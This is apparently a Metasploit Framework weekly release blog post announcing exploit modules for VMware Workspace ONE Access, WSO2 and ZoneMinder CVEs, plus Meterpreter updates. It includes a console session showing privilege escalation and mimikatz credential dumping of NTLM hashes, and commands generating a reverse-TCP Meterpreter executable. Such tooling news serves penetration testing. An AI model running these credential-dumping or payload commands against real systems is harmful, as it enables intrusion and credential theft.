Last updated at Fri, 06 May 2022 17:56:15 GMT
VMware Workspace ONE Access RCE
Community contributor wvu has developed a new Metasploit module that exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the ‘horizon’ user. The vulnerability has a CVSSv3 base score of 9.8, and a full technical analysis can be found in the official Rapid7 Analysis.
WSO2 Arbitrary File Upload to RCE
Our very own Jack Heysel has contributed a new module for CVE-2022-29464. Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a java/meterpreter/reverse_tcp payload inside a WAR file and uploads it to the target via the vulnerable file upload. It then executes the payload to open a session. A full technical analysis can be found in the official Rapid7 Analysis.
Kiwi Meterpreter Updates - Windows 11 Support
The Meterpreter Kiwi extension has been updated to pull in the latest changes from the upstream mimikatz project. Notably, this adds support for Windows 11 when running the creds_all command within a Meterpreter console:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi…
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( firstname.lastname@example.org )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( email@example.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > sysinfo
Computer        : WIN11-TEST
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : TESTINGDOMAIN
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain         NTLM                              SHA1
--------     ------         ----                              ----
WIN11-TEST$  TESTINGDOMAIN  a133becebb8e22321dbf26bf8d90f398  dbf0ad587f62004306f435903fb3a516da6ba104

... etc etc ...
New module content (3)
- VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954 - This adds an exploit for CVE-2022-22954, which is an unauthenticated RCE in VMware Workspace ONE Access.
- WSO2 Arbitrary File Upload to RCE by wvu, Jack Heysel, Orange Tsai, and hakivvi, which exploits CVE-2022-29464 - This adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution.
- ZoneMinder Language Settings Remote Code Execution by krastanoel, which exploits CVE-2022-29806 - This leverages a directory traversal and arbitrary file write in vulnerable versions of ZoneMinder to achieve remote code execution as the
Enhancements and features (2)
- #16445 from dwelch-r7 - The Windows Meterpreter payload now supports a MeterpreterDebugLogging datastore option for logging debug information to a file. Example usage:

use windows/x64/meterpreter_reverse_tcp
set MeterpreterDebugBuild true
set MeterpreterDebugLogging rpath:C:/test/foo.txt
save
generate -f exe -o shell.exe
to_handler

Bugs fixed (2)
- #16526 from jheysel-r7 - The version of Meterpreter Payloads has been upgraded to pull in a fix that ensures the Kiwi extension works properly on Windows 11 hosts and correctly dumps credentials, rather than failing silently as it did previously.
- #16530 from sjanusz-r7 - This updates the pihole_remove_commands_lpe module to no longer break sessions when running the check method.
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).